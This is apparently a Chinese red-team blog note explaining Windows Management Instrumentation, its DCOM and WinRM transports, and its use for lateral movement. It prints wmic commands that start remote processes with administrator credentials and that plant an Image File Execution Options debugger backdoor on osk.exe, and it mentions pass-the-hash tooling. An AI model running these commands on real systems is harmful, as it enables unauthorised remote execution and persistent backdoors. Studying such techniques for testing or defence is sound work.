了解WMI
什么叫WMI?
Windows管理规范(WMI)是Windows管理功能,它为本地和远程访问Windows系统组件提供了统一的环境。
它依赖于WMI服务进行本地和远程访问,并依赖于服务器消息块(SMB)和远程过程调用服务(RPCS)进行远程访问。
RPCS通过端口135运行。
wmi的类和命名空间怎么理解?
操作系统信息是通过WMI对象的方式表示的。一个WMI对象也就是一个WMI类的实例。
大多数常用的WMI类在MSDN中都有详细的描述,如Win32_Process类。然而还有很多WMI类并没有文档可查,
但是幸运的是,我们可以通过WQL来查询所有的WMI类。 与传统的面向对象编程语言相似,WMI类被分类分层的放在命名空间中。所有的命名空间都是从ROOT命名空间下的,
当不指定命名空间进行查询时,Microsoft会使用ROOT\CIMV2作为默认的命名空间。 所有的WMI设置,包括默认命名空间在下面的注册表键中: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM
wmi强大在哪里?相比psexec
WMI的强大体现在通过远程操作的时候。目前,WMI支持两种协议:DCOM和WinRM,使用这两种协议可以做任何事情,包括查询对象,注册事件和执行WMI类的方法,等等。 两种协议都对攻击者有利,因为防御者通常不会检查这两种协议的恶意流量。利用WMI所需的东西就是可用的有权限的用户凭证。在Linux平台上的wmis-pth工具中,只需要提供被攻击者的用户哈希即可。 DCOM (Distributed Component Object Model) 从WMI被引入的时候起,DCOM就被当作默认协议。DCOM通过135端口建立TCP连接,后续的数据交换则通过随机选择的TCP端口传输。这个端口可以通过dcomcnfg.exe进行配置和修改,其最终是改动如下注册表项: HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\Internet - Ports (REG_MULTI_SZ) 所有的PowerShell中内置的WMI命令都使用DCOM协议。 PS C:\Users\Michael\Desktop> Get-WmiObject -Class Win32_Process -ComputerName WIN-Q4UUJ0BPKL9 -Credential 'WIN-Q4UUJ0BPKL9\Administrator' WinRM (Windows Remote Management) 近来,WinRM已经超过了DCOM,被Windows当作建议使用的协议。WinRM基于Web Services-Management (WSMan)规范,是一个SOAP-based设备管理协议。另外,PowerShell Remoting也是基于WinRM规范的,这使得我们能够通过PowerShell在大规模Windows企业环境中实现强大的远程管理功能。WinRM同样支持WMI,或者说CIM的网络操作。 默认情况下,WinRM服务开启并监听5985/tcp端口,而且默认是加密的。还可以通过配置证书的方式在5986/tcp端口实现HTTPS支持。
我们是如何通过wmi横向的呐?,又是如何获取输出的结果的
wmi横向执行命令
C:\Users\Administrator\Desktop\PSTools>wmic /node:192.168.1.101 /user:administra
tor /password:123456 process call create "cmd.exe /c calc.exe"
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
ProcessId = 2732;
ReturnValue = 0;
};
wmi修改注册表添加后门
wmic /authority:”kerberos:Domain\user” /node:SQL01 process call create ‘reg.exe add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe” /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe”’
我们通过wireshark的流量包不难分析出wmic执行命令的过程
1进行NTML认证 2由于没有指定命名空间所以使用ROOT\CIMV2作为默认的命名空间。 3调用Win32_Process类中静态方法Create创建进程
但是这样的结果是不能被我们看见的
github上面有一款有回显的wmicexec.vbs
我们继续查看流量看他是如何获取回显的
https://github.com/Twi1ight/AD-Pentest-Script
第一步建立ipc$
然后新建了一个共享叫
然后新建一个叫wmi.dll的文件在此共享目录下面
从这里的数据分析不难看出创建的服务是我们要执行的命令输出到wmi.dll
读取完成后再删除wmi.dll
此过程完全流量透明很容易被ids侦察出来。(后续会思考如何加密流量)
参考
https://www.cnblogs.com/-qing-/p/11374136.html https://m0nst3r.me/pentest/%E5%88%A9%E7%94%A8WMI%E6%9E%84%E5%BB%BA%E4%B8%80%E4%B8%AA%E6%8C%81%E4%B9%85%E5%8C%96%E7%9A%84%E5%BC%82%E6%AD%A5%E7%9A%84%E6%97%A0%E6%96%87%E4%BB%B6%E5%90%8E%E9%97%A8.html https://sapsan.eth.link/hacktricks/windows/ntlm/wmicexec/ https://dmcxblue.gitbook.io/red-team-notes/execution/windows-management-instrumentation-wmi